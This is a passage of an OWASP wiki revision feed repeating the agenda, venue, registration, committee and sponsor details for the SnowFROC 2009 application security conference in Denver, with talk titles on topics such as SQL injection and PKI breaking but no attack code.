 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54197</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54197"/>
				<updated>2009-02-13T18:30:32Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Agenda and Presentations: 5 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;The Top Ten Hacks of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot;]]&lt;br /&gt;
''David Byrne, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54196</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54196"/>
				<updated>2009-02-13T18:30:04Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Agenda and Presentations: 5 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;The Top Ten Hacks of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter out the stupid&amp;quot;]]&lt;br /&gt;
''David Byrne, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
